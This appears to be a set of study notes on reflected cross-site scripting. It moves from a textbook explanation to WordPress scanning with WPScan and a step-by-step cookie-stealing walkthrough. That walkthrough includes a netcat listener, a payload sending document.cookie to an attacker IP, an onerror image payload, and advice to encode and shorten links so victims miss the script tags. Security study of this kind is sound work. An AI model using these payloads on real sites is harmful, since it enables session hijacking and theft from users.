4.2.2 Reflected XSS

Reflected XSS

What is reflected XSS (cross-site scripting)? Tutorial & Examples | Web Security AcademyWebSecAcademy

https://www.geeksforgeeks.org/what-is-cross-site-scripting-xss/

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Suppose a website has a search function which receives the user-supplied search term in a URL parameter:

https://insecure-website.com/search?term=gift

The application echoes the supplied search term in the response to this URL:

<p>You searched for: gift</p>

Assuming the application doesn't perform any other processing of the data, an attacker can construct an attack like this:

https://insecure-website.com/search?term=<script>/*+Bad+stuff+here...+*/</script>

This URL results in the following response:

<p>You searched for: <script>/* Bad stuff here... */</script></p>

If another user of the application requests the attacker's URL, then the script supplied by the attacker will execute in the victim user's browser, in the context of their session with the application.

Exploiting Reflected XSS Vulnerabilities in WordPress

What is WordPress?

WordPress is a popular open-source content management system (CMS) used for creating websites and blogs. It provides a user-friendly interface and a wide range of plugins and themes, making it easy for users to build and customize their websites without needing extensive technical knowledge. WordPress is highly customizable, scalable, and is used by millions of websites worldwide.

Mainly by not frequently updating installed themes and plugins versions, vulnerabilities may occur, and this is where the WPScan tool comes in.

WPScan is a security scanner specifically designed to test the security of WordPress websites. It can identify security vulnerabilities in WordPress installations, themes, and plugins. WPScan works by scanning the target website for known security issues, such as outdated software versions, weak passwords, and common configuration errors. It helps website owners and developers identify and fix security flaws to protect their websites from potential attacks and breaches.

We can install it using following command: sudo apt-get install wpscan

GitHub - wpscanteam/wpscan: WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.GitHub

• Go to wpscan.com, register, login and configure account.

• Generate an API key/token

• Launch scan -> wpscan --url <Website_URL>

• See results and search potential exploit on exploitdb using searchsploit <vulnerability_name>

• Encode and shorten the link possibly to be sent to the victim (to hiding JS tags)

Cookie Stealing Via Reflected XSS

• First verify that website is vulnerable to XSS -> <script>alert("XSS")</script>

• Take on listening on attacker machine using netcat -> nc -lvnp 4444

• Insert payload at the end of website -> new Image() .src='http://<Attacker_IP>:4444/?cookie=' + encodeURI(document.cookie);

• Encode and shorten the link possibly to be sent to the victim (to hiding JS tags), we can use BurpSuite decoder

• Obtain connection on netcat in listening.

Another good way is to 'trick' system inserting an imagine (without inserting it) and trigger the field onerror with our malicious payload: <img src=x onerror=alert(document.cookie)>